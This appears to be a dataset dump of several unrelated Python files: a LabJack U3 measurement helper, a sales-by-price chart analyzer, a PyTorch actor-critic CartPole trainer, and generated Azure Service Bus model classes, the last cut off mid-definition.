text stringlengths 957 885k |
|---|
<filename>readers/myU3.py
#!/usr/bin/python2.6
'''
Creates a MyU3 class that adds higher-level functionality to the base
LabJack U3 class.
'''
from __future__ import division
import u3
from time import sleep
import math
def getU3(**kargs):
    '''Returns an open MyU3 object, retrying every 2 seconds until the
    device opens successfully.  Keyword arguments are passed through to
    the MyU3 constructor.
    '''
    while True:
        try:
            return MyU3(**kargs)
        except Exception:
            # Catch Exception, not a bare 'except:' -- a bare except also
            # swallows KeyboardInterrupt/SystemExit, which made this retry
            # loop impossible to break out of with Ctrl-C.
            sleep(2)
            print('Trying to Open U3...')
class MyU3(u3.U3):
    '''
    Class that adds some functionality to the base u3.U3 class, which
    operates a U3 data acquisition device.
    '''

    def __init__(self, **kargs):
        # call the constructor in the base class
        u3.U3.__init__(self, **kargs)

    def getRMS(self, ch, signalFreq=60, numCycles=4):
        '''
        Returns the RMS voltage of a stream of readings on a channel.
        'ch' is the channel to sample.
        'signalFreq' is the fundamental frequency of the signal being sampled.
        'numCycles' is the number of full cycles of the signal that you want to
        sample for purposes of calculating the RMS value.
        I found that for 60 Hz signals, sampling 4 cycles produces stable
        readings.
        NOTE: there are limits to the frequency calculation below. Getting
        a packet from the U3 in streaming mode is limited to 1 second I think,
        and it will reduces the # of samples if the frequency is set so that
        less than 1200 samples arrive in 1 second.
        '''
        # There are 1200 samples in one streaming request of the U3.  Spread
        # those 1200 samples across 'numCycles' cycles of the signal to get
        # the required streaming sample frequency.
        freq = int(signalFreq / numCycles * 1200.0)
        freq = min(50000, freq)   # cap at 50 kHz

        # the U3 must operate at lower resolution if the streaming is very fast.
        if freq < 2500:
            resolution = 0
        elif freq < 10000:
            resolution = 1
        elif freq < 20000:
            resolution = 2
        else:
            resolution = 3

        self.streamConfig(NumChannels=1,
                          PChannels=[ch],
                          NChannels=[31],    # 31 indicates single-ended read
                          Resolution=resolution,
                          SampleFrequency=freq)
        try:
            self.streamStart()
            for r in self.streamData():
                # calculate the sum of the squares, average that, and take
                # square root to determine RMS.  sum() over a generator
                # replaces the original reduce() call, which is not a
                # builtin in Python 3.
                vals = r['AIN' + str(ch)]
                sum_sqr = sum(v * v for v in vals)
                return math.sqrt(sum_sqr / len(vals))
        finally:
            self.streamStop()

    def getAvg(self, ch, reads=8, specialRange=False, longSettle=True):
        '''
        Returns an analog reading of channel 'ch', but samples
        multiple times = 'reads' and then averages. If 'specialRange'
        is True, uses the higher voltage range for the channel.
        If 'longSettle' is True, a higher source impedance can be tolerated.
        '''
        # Negative channel 32 selects the special (higher) voltage range;
        # 31 selects a normal single-ended reading.
        negCh = 32 if specialRange else 31
        tot = 0.0
        for i in range(reads):
            tot += self.getAIN(ch, negCh, longSettle=longSettle)
        return tot / reads

    # Could add a routine to average an analog reading across
    # 4 60 Hz cycles using the stream function as in getRMS().

    def getDutyCycle(self, timer, reads=8):
        '''
        Returns the duty cycle measured by a timer. Assumes that the timer is already
        set to Mode = 4 for reading duty cycles.
        timer - the timer number, either 0 or 1.
        reads - the number of times to read the duty cycle and average
        '''
        tot = 0.0   # used to average the duty cycle readings
        for i in range(reads):
            val = self.getFeedback(u3.Timer(timer=timer))[0]
            # The 32-bit timer value packs the high-time count in the low
            # 16 bits and the low-time count in the high 16 bits.
            hi = float(val % 2 ** 16)
            # BUG FIX: with 'from __future__ import division' in effect,
            # the original 'val / 2**16' was TRUE division, which left a
            # fractional part in 'lo' and skewed every duty-cycle reading.
            # Floor division extracts the high 16-bit word correctly.
            lo = float(val // 2 ** 16)
            tot += hi / (lo + hi)
        return tot / reads
if __name__ == '__main__':
    # Quick hardware smoke test: open the device and print RMS readings
    # from channel 6 twice a second until interrupted.

    # create the device object
    d = MyU3()

    # Set all possible inputs to Analog.
    # Create a bit mask indicating which channels are analog:
    FIOEIOAnalog = (2 ** 16) - 1
    fios = FIOEIOAnalog & 0xFF       # the bottom 8 bits
    eios = FIOEIOAnalog // 256       # shift 8 places to get the top 8 bits
    d.configIO(FIOAnalog=fios, EIOAnalog=int(eios))

    try:
        while True:
            # print('%.3f' % d.getAvg(6))
            # print('%.2f' % ((d.getAvg(30) - 273.15) * 1.8 + 32.0))
            print('%.3f' % d.getRMS(6))
            sleep(0.5)
    finally:
        # always release the device, even on Ctrl-C
        d.close()
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
from numpy import ceil, floor
class SoldNumberAnalyzer:
    """Product sales analyzer: builds a stacked price/sales chart from
    brand keywords and item prices."""

    def __init__(self, keywords, db, div=10):
        """
        :param keywords: dict mapping a brand name to a list of keyword
            aliases that identify the brand in item titles, e.g.
            {'小米': ['米', 'mi'], '苹果': ['苹果', 'apple', 'iphone']}
        :param db: a pymongo.MongoClient.db instance
        :param div: number of price intervals to divide the range into
        """
        self.keywords = keywords
        self.__db = db
        self.div = div

    def __count_by_price(self):
        """
        For every brand, count sales per price point and store the result
        in self.__sold as {brand: {price: sold_count}}.
        """
        self.__sold = dict()
        # initialize the sold dict
        for k in self.keywords.keys():
            self.__sold[k] = dict()
        items = list(self.__db.items.find({'is_crawled': True}))
        count = 0
        items_len = self.__db.items.count({'is_crawled': True})
        for item in items:
            count += 1
            print('read_rates_by_brand: ({}/{})'.format(count, items_len))
            # hoisted: price and lower-cased title were recomputed on every
            # keyword comparison in the original
            price = float(item['price'])
            title = item['title'].lower()
            for brand, keywords_list in self.keywords.items():
                for keyword in keywords_list:
                    # if keyword is in the item title.
                    if keyword in title:
                        # count rates (reviews) for this item via item_id
                        self.__sold[brand][price] = (
                            self.__sold[brand].get(price, 0)
                            + self.__db.rates.count({'item_id': item['item_id']}))
        print(self.__sold)

    def __get_sold(self, lower, upper, brand):
        """
        Return the sales volume for *brand* with price in [lower, upper).
        :param lower: lower price bound (inclusive)
        :param upper: upper price bound (exclusive)
        :param brand: brand name
        :return: total sales volume
        """
        data = self.__sold[brand]
        # renamed from 'sum', which shadowed the builtin
        total = 0
        for price, count in data.items():
            if lower <= price < upper:
                total += count
        return total

    def __draw_stack_chart(self, div):
        """
        Draw the stacked area chart of sales per price interval.
        :param div: number of price intervals
        :return: a matplotlib.pyplot instance
        """
        prices_list = []
        for brand_data in self.__sold.values():
            for price in brand_data.keys():
                prices_list.append(price)
        min_price = int(floor(min(prices_list)))
        max_price = int(ceil(max(prices_list)))
        # generate the price sequence from min price to max price.
        # Guard the step: when max_price - min_price < div the original
        # step of int((max-min)/div) was 0 and range() raised
        # "arg 3 must not be zero".
        step = max(1, int((max_price - min_price) / div))
        prices_seq = list(range(min_price, max_price, step))
        if not prices_seq:
            # all prices identical (min == max): keep a single bucket
            prices_seq = [min_price]
        if prices_seq[-1] != max_price:
            prices_seq.append(max_price)
        # generate the related sold list; the extra sentinel makes the last
        # interval include max_price itself
        temp = prices_seq.copy()
        temp.append(max_price + 1)
        brands = list(self.keywords.keys())
        counts = []
        for brand in brands:
            counts.append([self.__get_sold(temp[i], temp[i + 1], brand)
                           for i in range(len(temp) - 1)])
        plt.figure(figsize=(15, 5))
        plt.style.use('ggplot')
        plt.stackplot(prices_seq, counts, labels=brands)
        plt.legend(loc='best')
        plt.tick_params(top='off', right='off')
        return plt

    def run(self):
        """
        Run the analyzer and draw the stacked chart.
        :return: a matplotlib.pyplot instance
        """
        self.__count_by_price()
        return self.__draw_stack_chart(self.div)
import gym
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
# Hyperparameters
learning_rate = 0.0002  # Adam optimizer step size
gamma = 0.98            # discount factor applied to bootstrapped values
n_rollout = 10          # environment steps collected between updates
class ActorCritic(nn.Module):
    """Shared-trunk actor-critic network for CartPole (4 observations,
    2 discrete actions), with a built-in transition buffer and optimizer."""

    def __init__(self):
        super(ActorCritic, self).__init__()
        self.data = []                     # rollout buffer of transitions
        self.fc1 = nn.Linear(4, 256)       # shared feature layer
        self.fc_pi = nn.Linear(256, 2)     # policy head
        self.fc_v = nn.Linear(256, 1)      # value head
        self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)

    def pi(self, x, softmax_dim=0):
        """Return action probabilities for observation(s) x."""
        hidden = F.relu(self.fc1(x))
        logits = self.fc_pi(hidden)
        return F.softmax(logits, dim=softmax_dim)

    def v(self, x):
        """Return the state-value estimate for observation(s) x."""
        hidden = F.relu(self.fc1(x))
        return self.fc_v(hidden)

    def put_data(self, transition):
        """Buffer one (s, a, r, s', done) transition."""
        self.data.append(transition)

    def make_batch(self):
        """Convert buffered transitions into training tensors and clear the
        buffer.  Rewards are scaled by 1/100; 'done' becomes a 0/1 mask
        (0 stops bootstrapping at episode end)."""
        s_lst, a_lst, r_lst, s_prime_lst, done_lst = [], [], [], [], []
        for s, a, r, s_prime, done in self.data:
            s_lst.append(s)
            a_lst.append([a])
            r_lst.append([r / 100.0])
            s_prime_lst.append(s_prime)
            done_lst.append([0.0 if done else 1.0])
        batch = (torch.tensor(s_lst, dtype=torch.float),
                 torch.tensor(a_lst),
                 torch.tensor(r_lst, dtype=torch.float),
                 torch.tensor(s_prime_lst, dtype=torch.float),
                 torch.tensor(done_lst, dtype=torch.float))
        self.data = []
        return batch

    def train_net(self):
        """Run one actor-critic update over the buffered rollout."""
        s, a, r, s_prime, done = self.make_batch()
        td_target = r + gamma * self.v(s_prime) * done
        delta = td_target - self.v(s)   # TD error = advantage estimate
        pi = self.pi(s, softmax_dim=1)
        pi_a = pi.gather(1, a)          # probability of the taken action
        # policy gradient term + value regression term
        loss = -torch.log(pi_a) * delta.detach() + F.smooth_l1_loss(self.v(s), td_target.detach())
        self.optimizer.zero_grad()
        loss.mean().backward()
        self.optimizer.step()
def main():
    """Train ActorCritic on CartPole-v1, printing the average score every
    20 episodes.  Collects up to n_rollout steps per update."""
    env = gym.make('CartPole-v1')
    model = ActorCritic()
    print_interval = 20
    score = 0.0

    for n_epi in range(10000):
        done = False
        # NOTE(review): assumes the classic gym API where reset() returns
        # only the observation and step() returns 4 values -- confirm the
        # installed gym version.
        s = env.reset()
        while not done:
            # gather a short rollout, then do one training update
            for t in range(n_rollout):
                prob = model.pi(torch.from_numpy(s).float())
                m = Categorical(prob)
                a = m.sample().item()
                s_prime, r, done, info = env.step(a)
                model.put_data((s, a, r, s_prime, done))

                s = s_prime
                score += r

                if done:
                    break

            model.train_net()

        if n_epi % print_interval == 0 and n_epi != 0:
            print("# of episode :{}, avg score : {:.1f}".format(n_epi, score / print_interval))
            score = 0.0
    env.close()


if __name__ == '__main__':
    main()
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AuthorizationRule(msrest.serialization.Model):
    """Authorization rule of an entity.

    :param type:
    :type type: str
    :param claim_type:
    :type claim_type: str
    :param claim_value:
    :type claim_value: str
    :param rights: Access rights of the entity. Values are 'Send', 'Listen', or 'Manage'.
    :type rights: list[str]
    :param created_time: The date and time when the authorization rule was created.
    :type created_time: ~datetime.datetime
    :param modified_time: The date and time when the authorization rule was modified.
    :type modified_time: ~datetime.datetime
    :param key_name: The authorization rule key name.
    :type key_name: str
    :param primary_key: The primary key of the authorization rule.
    :type primary_key: str
    :param secondary_key: The secondary key of the authorization rule.
    :type secondary_key: str
    """

    # msrest serialization map: attribute -> XML element/attribute name,
    # wire type, and XML namespace.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True, 'prefix': 'i', 'ns': 'http://www.w3.org/2001/XMLSchema-instance'}},
        'claim_type': {'key': 'ClaimType', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'claim_value': {'key': 'ClaimValue', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'rights': {'key': 'Rights', 'type': '[str]', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AccessRights', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'created_time': {'key': 'CreatedTime', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'modified_time': {'key': 'ModifiedTime', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'key_name': {'key': 'KeyName', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'primary_key': {'key': 'PrimaryKey', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'secondary_key': {'key': 'SecondaryKey', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
    }
    # XML root element name and namespace for this model.
    _xml_map = {
        'name': 'AuthorizationRule', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(AuthorizationRule, self).__init__(**kwargs)
        self.type = kwargs.get('type', None)
        self.claim_type = kwargs.get('claim_type', None)
        self.claim_value = kwargs.get('claim_value', None)
        self.rights = kwargs.get('rights', None)
        self.created_time = kwargs.get('created_time', None)
        self.modified_time = kwargs.get('modified_time', None)
        self.key_name = kwargs.get('key_name', None)
        self.primary_key = kwargs.get('primary_key', None)
        self.secondary_key = kwargs.get('secondary_key', None)
class CreateQueueBody(msrest.serialization.Model):
    """The request body for creating a queue.

    :param content: QueueDescription for the new queue.
    :type content: ~azure.servicebus.management._generated.models.CreateQueueBodyContent
    """

    # msrest serialization map: attribute -> XML element name and wire type.
    _attribute_map = {
        'content': {'key': 'content', 'type': 'CreateQueueBodyContent'},
    }
    # Serialized as an Atom <entry> root element.
    _xml_map = {
        'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(CreateQueueBody, self).__init__(**kwargs)
        self.content = kwargs.get('content', None)
class CreateQueueBodyContent(msrest.serialization.Model):
    """QueueDescription for the new queue.

    :param type: MIME type of content.  Defaults to "application/xml".
    :type type: str
    :param queue_description: Properties of the new queue.
    :type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
    """

    # msrest serialization map: 'type' is an XML attribute, the description
    # a nested element.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
        'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
    }
    # Element lives in the Atom namespace.
    _xml_map = {
        'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(CreateQueueBodyContent, self).__init__(**kwargs)
        self.type = kwargs.get('type', "application/xml")
        self.queue_description = kwargs.get('queue_description', None)
class CreateTopicBody(msrest.serialization.Model):
    """The request body for creating a topic.

    :param content: TopicDescription for the new topic.
    :type content: ~azure.servicebus.management._generated.models.CreateTopicBodyContent
    """

    # msrest serialization map: attribute -> XML element name and wire type.
    _attribute_map = {
        'content': {'key': 'content', 'type': 'CreateTopicBodyContent'},
    }
    # Serialized as an Atom <entry> root element.
    _xml_map = {
        'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(CreateTopicBody, self).__init__(**kwargs)
        self.content = kwargs.get('content', None)
class CreateTopicBodyContent(msrest.serialization.Model):
    """TopicDescription for the new topic.

    :param type: MIME type of content.  Defaults to "application/xml".
    :type type: str
    :param topic_description: Topic information to create.
    :type topic_description: ~azure.servicebus.management._generated.models.TopicDescription
    """

    # msrest serialization map: 'type' is an XML attribute, the description
    # a nested element.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
        'topic_description': {'key': 'TopicDescription', 'type': 'TopicDescription'},
    }
    # Element lives in the Atom namespace.
    _xml_map = {
        'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(CreateTopicBodyContent, self).__init__(**kwargs)
        self.type = kwargs.get('type', "application/xml")
        self.topic_description = kwargs.get('topic_description', None)
class MessageCountDetails(msrest.serialization.Model):
    """Details about the message counts in queue.

    :param active_message_count: Number of active messages in the queue, topic, or subscription.
    :type active_message_count: int
    :param dead_letter_message_count: Number of messages that are dead lettered.
    :type dead_letter_message_count: int
    :param scheduled_message_count: Number of scheduled messages.
    :type scheduled_message_count: int
    :param transfer_dead_letter_message_count: Number of messages transferred into dead letters.
    :type transfer_dead_letter_message_count: int
    :param transfer_message_count: Number of messages transferred to another queue, topic, or
     subscription.
    :type transfer_message_count: int
    """

    # msrest serialization map; these counts use the 2011/06 servicebus
    # namespace with the 'd2p1' prefix, unlike the rest of the models.
    _attribute_map = {
        'active_message_count': {'key': 'ActiveMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
        'dead_letter_message_count': {'key': 'DeadLetterMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
        'scheduled_message_count': {'key': 'ScheduledMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
        'transfer_dead_letter_message_count': {'key': 'TransferDeadLetterMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
        'transfer_message_count': {'key': 'TransferMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
    }
    # XML root element name and namespace for this model.
    _xml_map = {
        'name': 'CountDetails', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MessageCountDetails, self).__init__(**kwargs)
        self.active_message_count = kwargs.get('active_message_count', None)
        self.dead_letter_message_count = kwargs.get('dead_letter_message_count', None)
        self.scheduled_message_count = kwargs.get('scheduled_message_count', None)
        self.transfer_dead_letter_message_count = kwargs.get('transfer_dead_letter_message_count', None)
        self.transfer_message_count = kwargs.get('transfer_message_count', None)
class QueueDescription(msrest.serialization.Model):
    """Description of a Service Bus queue resource.

    :param authorization_rules: Authorization rules for resource.
    :type authorization_rules:
     list[~azure.servicebus.management._generated.models.AuthorizationRule]
    :param auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the queue is
     automatically deleted. The minimum duration is 5 minutes.
    :type auto_delete_on_idle: ~datetime.timedelta
    :param created_at: The exact time the queue was created.
    :type created_at: ~datetime.datetime
    :param dead_lettering_on_message_expiration: A value that indicates whether this queue has dead
     letter support when a message expires.
    :type dead_lettering_on_message_expiration: bool
    :param default_message_time_to_live: ISO 8601 default message timespan to live value. This is
     the duration after which the message expires, starting from when the message is sent to Service
     Bus. This is the default value used when TimeToLive is not set on a message itself.
    :type default_message_time_to_live: ~datetime.timedelta
    :param duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
     duration of the duplicate detection history. The default value is 10 minutes.
    :type duplicate_detection_history_time_window: ~datetime.timedelta
    :param entity_availability_status: Availibility status of the entity. Possible values include:
     "Available", "Limited", "Renaming", "Restoring", "Unknown".
    :type entity_availability_status: str or
     ~azure.servicebus.management._generated.models.EntityAvailabilityStatus
    :param enable_batched_operations: Value that indicates whether server-side batched operations
     are enabled.
    :type enable_batched_operations: bool
    :param enable_express: A value that indicates whether Express Entities are enabled. An express
     queue holds a message in memory temporarily before writing it to persistent storage.
    :type enable_express: bool
    :param enable_partitioning: A value that indicates whether the queue is to be partitioned
     across multiple message brokers.
    :type enable_partitioning: bool
    :param is_anonymous_accessible: A value indicating if the resource can be accessed without
     authorization.
    :type is_anonymous_accessible: bool
    :param lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
     that the message is locked for other receivers. The maximum value for LockDuration is 5
     minutes; the default value is 1 minute.
    :type lock_duration: ~datetime.timedelta
    :param max_delivery_count: The maximum delivery count. A message is automatically deadlettered
     after this number of deliveries. Default value is 10.
    :type max_delivery_count: int
    :param max_size_in_megabytes: The maximum size of the queue in megabytes, which is the size of
     memory allocated for the queue.
    :type max_size_in_megabytes: int
    :param requires_duplicate_detection: A value indicating if this queue requires duplicate
     detection.
    :type requires_duplicate_detection: bool
    :param requires_session: A value that indicates whether the queue supports the concept of
     sessions.
    :type requires_session: bool
    :param status: Status of a Service Bus resource. Possible values include: "Active", "Creating",
     "Deleting", "Disabled", "ReceiveDisabled", "Renaming", "Restoring", "SendDisabled", "Unknown".
    :type status: str or ~azure.servicebus.management._generated.models.EntityStatus
    :param support_ordering: A value that indicates whether the queue supports ordering.
    :type support_ordering: bool
    :param accessed_at: Last time a message was sent, or the last time there was a receive request
     to this queue.
    :type accessed_at: ~datetime.datetime
    :param updated_at: The exact time a message was updated in the queue.
    :type updated_at: ~datetime.datetime
    :param size_in_bytes: The size of the queue, in bytes.
    :type size_in_bytes: int
    :param message_count: The number of messages in the queue.
    :type message_count: int
    :param message_count_details: Details about the message counts in queue.
    :type message_count_details: ~azure.servicebus.management._generated.models.MessageCountDetails
    """

    # msrest serialization map: attribute -> XML element name, wire type,
    # and XML namespace.
    _attribute_map = {
        'authorization_rules': {'key': 'AuthorizationRules', 'type': '[AuthorizationRule]', 'xml': {'name': 'AuthorizationRules', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AuthorizationRule', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'auto_delete_on_idle': {'key': 'AutoDeleteOnIdle', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'created_at': {'key': 'CreatedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'dead_lettering_on_message_expiration': {'key': 'DeadLetteringOnMessageExpiration', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'default_message_time_to_live': {'key': 'DefaultMessageTimeToLive', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'duplicate_detection_history_time_window': {'key': 'DuplicateDetectionHistoryTimeWindow', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'entity_availability_status': {'key': 'EntityAvailabilityStatus', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'enable_batched_operations': {'key': 'EnableBatchedOperations', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'enable_express': {'key': 'EnableExpress', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'enable_partitioning': {'key': 'EnablePartitioning', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'is_anonymous_accessible': {'key': 'IsAnonymousAccessible', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'lock_duration': {'key': 'LockDuration', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'max_delivery_count': {'key': 'MaxDeliveryCount', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'max_size_in_megabytes': {'key': 'MaxSizeInMegabytes', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'requires_duplicate_detection': {'key': 'RequiresDuplicateDetection', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'requires_session': {'key': 'RequiresSession', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'status': {'key': 'Status', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'support_ordering': {'key': 'SupportOrdering', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'accessed_at': {'key': 'AccessedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'updated_at': {'key': 'UpdatedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'size_in_bytes': {'key': 'SizeInBytes', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'message_count': {'key': 'MessageCount', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
        'message_count_details': {'key': 'MessageCountDetails', 'type': 'MessageCountDetails'},
    }
    # XML root element name and namespace for this model.
    _xml_map = {
        'name': 'QueueDescription', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescription, self).__init__(**kwargs)
        self.authorization_rules = kwargs.get('authorization_rules', None)
        self.auto_delete_on_idle = kwargs.get('auto_delete_on_idle', None)
        self.created_at = kwargs.get('created_at', None)
        self.dead_lettering_on_message_expiration = kwargs.get('dead_lettering_on_message_expiration', None)
        self.default_message_time_to_live = kwargs.get('default_message_time_to_live', None)
        self.duplicate_detection_history_time_window = kwargs.get('duplicate_detection_history_time_window', None)
        self.entity_availability_status = kwargs.get('entity_availability_status', None)
        self.enable_batched_operations = kwargs.get('enable_batched_operations', None)
        self.enable_express = kwargs.get('enable_express', None)
        self.enable_partitioning = kwargs.get('enable_partitioning', None)
        self.is_anonymous_accessible = kwargs.get('is_anonymous_accessible', None)
        self.lock_duration = kwargs.get('lock_duration', None)
        self.max_delivery_count = kwargs.get('max_delivery_count', None)
        self.max_size_in_megabytes = kwargs.get('max_size_in_megabytes', None)
        self.requires_duplicate_detection = kwargs.get('requires_duplicate_detection', None)
        self.requires_session = kwargs.get('requires_session', None)
        self.status = kwargs.get('status', None)
        self.support_ordering = kwargs.get('support_ordering', None)
        self.accessed_at = kwargs.get('accessed_at', None)
        self.updated_at = kwargs.get('updated_at', None)
        self.size_in_bytes = kwargs.get('size_in_bytes', None)
        self.message_count = kwargs.get('message_count', None)
        self.message_count_details = kwargs.get('message_count_details', None)
class QueueDescriptionEntry(msrest.serialization.Model):
    """Represents an entry in the feed when querying queues.

    :param base: Base URL for the query.
    :type base: str
    :param id: The URL of the GET request.
    :type id: str
    :param title: The name of the queue.
    :type title: ~azure.servicebus.management._generated.models.ResponseTitle
    :param published: The timestamp for when this queue was published.
    :type published: ~datetime.datetime
    :param updated: The timestamp for when this queue was last updated.
    :type updated: ~datetime.datetime
    :param author: The author that created this resource.
    :type author: ~azure.servicebus.management._generated.models.ResponseAuthor
    :param link: The URL for the HTTP request.
    :type link: ~azure.servicebus.management._generated.models.ResponseLink
    :param content: The QueueDescription.
    :type content: ~azure.servicebus.management._generated.models.QueueDescriptionEntryContent
    """

    # msrest serialization map: 'base' is the xml:base attribute; the rest
    # are Atom child elements.
    _attribute_map = {
        'base': {'key': 'base', 'type': 'str', 'xml': {'name': 'base', 'attr': True, 'prefix': 'xml'}},
        'id': {'key': 'id', 'type': 'str'},
        'title': {'key': 'title', 'type': 'ResponseTitle'},
        'published': {'key': 'published', 'type': 'iso-8601'},
        'updated': {'key': 'updated', 'type': 'iso-8601'},
        'author': {'key': 'author', 'type': 'ResponseAuthor'},
        'link': {'key': 'link', 'type': 'ResponseLink'},
        'content': {'key': 'content', 'type': 'QueueDescriptionEntryContent'},
    }
    # Serialized as an Atom <entry> root element.
    _xml_map = {
        'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescriptionEntry, self).__init__(**kwargs)
        self.base = kwargs.get('base', None)
        self.id = kwargs.get('id', None)
        self.title = kwargs.get('title', None)
        self.published = kwargs.get('published', None)
        self.updated = kwargs.get('updated', None)
        self.author = kwargs.get('author', None)
        self.link = kwargs.get('link', None)
        self.content = kwargs.get('content', None)
class QueueDescriptionEntryContent(msrest.serialization.Model):
    """The QueueDescription.

    :param type: Type of content in queue response.
    :type type: str
    :param queue_description: Description of a Service Bus queue resource.
    :type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
    """

    # msrest serialization map: 'type' is an XML attribute, the description
    # a nested element.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
        'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(QueueDescriptionEntryContent, self).__init__(**kwargs)
        self.type = kwargs.get('type', None)
        self.queue_description = kwargs.get('queue_description', None)
class QueueDescriptionFeed(msrest.serialization.Model):
    """Response from listing Service Bus queues.

    :param id: URL of the list queues query.
    :type id: str
    :param title: The entity type for the feed.
    :type title: str
    :param updated: Datetime of the query.
    :type updated: ~datetime.datetime
    :param link: Links to paginated response.
    :type link: list[~azure.servicebus.management._generated.models.ResponseLink]
    :param entry: Queue entries.
    :type entry: list[~azure.servicebus.management._generated.models.QueueDescriptionEntry]
    """

    # msrest serialization map: attribute -> Atom feed child element.
    _attribute_map = {
